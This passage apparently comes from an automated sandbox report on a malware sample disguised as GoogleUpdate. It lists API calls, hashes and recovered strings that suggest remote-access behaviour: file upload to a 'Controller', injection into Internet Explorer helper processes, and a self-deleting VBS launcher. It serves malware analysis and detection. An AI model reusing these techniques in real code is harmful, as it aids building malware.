                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID: 0Zj
                                • API String ID: 3899193279-907608346
                                • Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                • Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                • _free.LIBCMT ref: 0044E4DF
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E501
                                • _free.LIBCMT ref: 0044E516
                                • _free.LIBCMT ref: 0044E521
                                • _free.LIBCMT ref: 0044E543
                                • _free.LIBCMT ref: 0044E556
                                • _free.LIBCMT ref: 0044E564
                                • _free.LIBCMT ref: 0044E56F
                                • _free.LIBCMT ref: 0044E5A7
                                • _free.LIBCMT ref: 0044E5AE
                                • _free.LIBCMT ref: 0044E5CB
                                • _free.LIBCMT ref: 0044E5E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID: xF
                                • API String ID: 161543041-2169143296
                                • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,6C4E8300,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                • Sleep.KERNEL32(00000064), ref: 00411C63
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$$.F$@#G$@#G
                                • API String ID: 1223786279-2596709126
                                • Opcode ID: 495cc6ad49e5aae7b59b88f6a300b17bd28adf3321db0968c749ba4b08e7e4c6
                                • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                • Opcode Fuzzy Hash: 495cc6ad49e5aae7b59b88f6a300b17bd28adf3321db0968c749ba4b08e7e4c6
                                • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: pF
                                • API String ID: 269201875-2973420481
                                • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                • String ID: 0gj$Attempt-S4A0CI$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                • API String ID: 193334293-205681062
                                • Opcode ID: 6a58b71f373a24f92db658ce6798ec1ce32bab572a0f3f6893fd0dbd1fb820b1
                                • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                • Opcode Fuzzy Hash: 6a58b71f373a24f92db658ce6798ec1ce32bab572a0f3f6893fd0dbd1fb820b1
                                • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                • GetCursorPos.USER32(?), ref: 0041B39E
                                • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                • ExitProcess.KERNEL32 ref: 0041B41A
                                • CreatePopupMenu.USER32 ref: 0041B420
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                • Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$getaddrinfo
                                • API String ID: 2490988753-3078833738
                                • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                • __aulldiv.LIBCMT ref: 00407D89
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                • CloseHandle.KERNEL32(00000000), ref: 00408038
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                • API String ID: 3086580692-2596673759
                                • Opcode ID: 0bf9094f8cb5ccb1e9936480546baf742d531f49806deb6dce3db096e9500c3f
                                • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                • Opcode Fuzzy Hash: 0bf9094f8cb5ccb1e9936480546baf742d531f49806deb6dce3db096e9500c3f
                                • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,0gj,0040E2B2), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                  • Part of subcall function 004120E8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,0gj), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000410,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.KERNEL32(00000000), ref: 00412128
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                • ExitProcess.KERNEL32 ref: 0040C57D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                • API String ID: 1913171305-2600661426
                                • Opcode ID: b9122ed72e7124bcff94e440666a7133dce096a2a06c353d0af5e61ef2c7c11c
                                • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                • Opcode Fuzzy Hash: b9122ed72e7124bcff94e440666a7133dce096a2a06c353d0af5e61ef2c7c11c
                                • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                APIs
                                  • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                • CloseHandle.KERNEL32(00000000), ref: 00416123
                                • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: <$@$@%G$@%G$P0F$Temp
                                • API String ID: 1704390241-846188940
                                • Opcode ID: ad18d4deb5df07c6958a9f1bbc129edf31925435e799cf8b42d4c5e638feefef
                                • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                • Opcode Fuzzy Hash: ad18d4deb5df07c6958a9f1bbc129edf31925435e799cf8b42d4c5e638feefef
                                • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                • __dosmaperr.LIBCMT ref: 00438646
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                • __dosmaperr.LIBCMT ref: 00438683
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                • __dosmaperr.LIBCMT ref: 004386D7
                                • _free.LIBCMT ref: 004386E3
                                • _free.LIBCMT ref: 004386EA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
                                • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                • Opcode Fuzzy Hash: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
                                • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7
                                • API String ID: 0-3177665633
                                • Opcode ID: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
                                • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                • Opcode Fuzzy Hash: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
                                • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: pF$tF
                                • API String ID: 269201875-2954683558
                                • Opcode ID: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
                                • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                • Opcode Fuzzy Hash: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
